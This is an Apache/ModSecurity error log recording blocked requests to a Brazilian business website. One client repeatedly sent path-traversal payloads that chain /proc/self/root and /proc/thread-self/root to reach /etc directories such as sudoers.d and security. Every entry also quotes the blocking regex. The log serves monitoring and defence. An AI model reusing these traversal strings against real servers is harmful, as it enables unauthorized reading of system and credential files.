[Mon Mar 16 11:09:59.395220 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.243.203:49880] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPN3jZBu2q05ozVU9MlQAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:00.733383 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.243.203:57284] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPOJqj1wV0Si-OkefhcQAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:02.547221 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.243.203:57294] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPOo6lpbStxTqkSktkawAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:03.895525 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:57304] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPO_9ocpUE4ed4uDzkngAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:05.222694 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.243.203:57306] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPPdSswJuvopo3lOhWxQAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:07.649362 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.243.203:57318] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPP7ysWC90G-1nBrA7cgAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:09.180250 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.243.203:57324] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPQdSswJuvopo3lOhWxgAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:10.349864 2026] [:error] [pid 10709:tid 140411725141760] [client 74.7.243.203:51902] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPQhXjF1vJNtV6CWruogAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:11.684207 2026] [:error] [pid 21946:tid 140411607643904] [client 74.7.243.203:51912] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPQ3bQATo66fKoS7xFIgAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:11.820109 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.241.46:37716] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPQ3jZBu2q05ozVU9MqgAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:12.956440 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.243.203:51914] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPRLysWC90G-1nBrA7dAAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:14.268985 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.243.203:51928] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPRtSswJuvopo3lOhWxwAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:15.622376 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:51940] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPR7ABkC4fWIHEf8HifgAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:16.931368 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.243.203:51942] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPSLysWC90G-1nBrA7dgAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:18.092575 2026] [:error] [pid 10709:tid 140411548894976] [client 74.7.243.203:51958] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPShXjF1vJNtV6CWrupAAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:30.671690 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.243.203:51970] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPVnjZBu2q05ozVU9MyQAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:34.063486 2026] [:error] [pid 10709:tid 140411649607424] [client 74.7.243.203:53352] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPWhXjF1vJNtV6CWruqQAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:42.434949 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.243.203:53364] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPYZqj1wV0Si-OkefhlQAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:10:54.436899 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.243.203:34660] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPbpqj1wV0Si-OkefhrgAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:10:58.924214 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.243.203:55152] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPcnbQATo66fKoS7xFKgAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:11:01.633345 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.243.203:49078] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgPdJqj1wV0Si-OkefhtAAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
